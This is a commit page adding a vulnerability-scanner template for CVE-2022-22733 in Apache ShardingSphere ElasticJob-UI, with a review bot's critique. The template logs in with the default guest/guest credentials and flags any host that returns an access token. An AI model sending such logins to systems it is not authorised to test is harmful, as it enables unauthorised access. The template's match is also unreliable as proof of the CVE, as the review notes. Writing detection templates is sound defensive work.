Add template for CVE-2022-22733 Apache ShardingSphere ElasticJob-UI privilege escalation

patch-1
Zer0verflow 2023-05-11 10:57:33 +08:00 committed by GitHub
parent 27e95ef56e
commit 80d33d7741
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions


@ -0,0 +1,31 @@
id: CVE-2022-22733
info:
name: CVE-2022-22733 Apache ShardingSphere ElasticJob-UI privilege escalation
author: Zeyad Azima
severity: medium
description: CVE-2022-22733 is an Apache ShardingSphere ElasticJob-UI privilege escalation vulnerability and you could achieve Remote Code Execution checkout the Reference URL for full analysis of the vulnerability.
reference: https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation
requests:
- method: POST
path:
- "{{BaseURL}}/api/login"
headers:
Host: "192.168.0.162:8888"
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
Accept: "application/json, text/plain, */*"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate"
Content-Type: "application/json;charset=utf-8"
Access-Token: ""
Content-Length: "39"
Origin: "http://192.168.0.162:8888"
DNT: "1"
Connection: "close"
Referer: "http://192.168.0.162:8888/"
body: '{"username":"guest","password":"guest"}'
matchers:
- type: word
words:
- '"accessToken":'
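Review bot: The only matcher is the word `"accessToken":` in the reply to the guest/guest login, which shows that the default guest account can log in, not that the instance is affected by CVE-2022-22733. A fixed release that still ships the guest account would presumably return a token as well and be reported as vulnerable. The match should be tied to the vulnerable behaviour described in the referenced analysis, or at least to a version check, and combined with a `type: status` matcher under `matchers-condition: and`. Separately, `Host`, `Origin` and `Referer` are pinned to 192.168.0.162:8888 and `Content-Length` to 39, so every scanned target receives the author's lab address; drop these headers, or use `Host: "{{Hostname}}"` and `Origin: "{{RootURL}}"`. The page renders the file with its indentation stripped, so the nesting of `info`, `requests` and `matchers` could not be checked here.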